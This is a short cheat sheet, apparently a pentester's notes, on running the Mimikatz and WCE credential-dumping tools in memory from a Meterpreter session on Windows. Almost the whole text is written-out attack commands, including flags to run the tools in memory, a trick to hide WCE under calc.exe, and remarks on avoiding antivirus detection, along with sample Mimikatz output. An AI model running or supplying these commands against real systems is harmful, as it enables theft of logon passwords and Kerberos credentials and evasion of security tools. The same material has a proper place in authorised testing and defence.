Run Mimikatz and WCE in memory with meterpreter
IMPORTANT: you need to be SYSTEM and to migrate to a suitable process in order to succeed.
Mimikatz
execute -H -c -f /home/unknown/Tools/mimikatz_trunk/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit' -m
Or, if you want to be detected by the antivirus (no -m flag):
meterpreter > execute -H -i -c -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
Process 4288 created.
Channel 3 created.
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Jul 4 2013 01:26:01) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # sekurlsa::logonPasswords full
Problem: How do I use a mimikatz dll without being detected by the AV?
Alternative:
meterpreter > load mimikatz
meterpreter > kerberos
meterpreter > wdigest
The same approach works for WCE:
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
Inspired by:
http://justinelze.wordpress.com/2013/03/25/wce-and-mimikatz-in-memory-over-meterpreter/
http://www.room362.com/blog/2012/09/05/completely-in-memory-mimikatz-with-metasploit/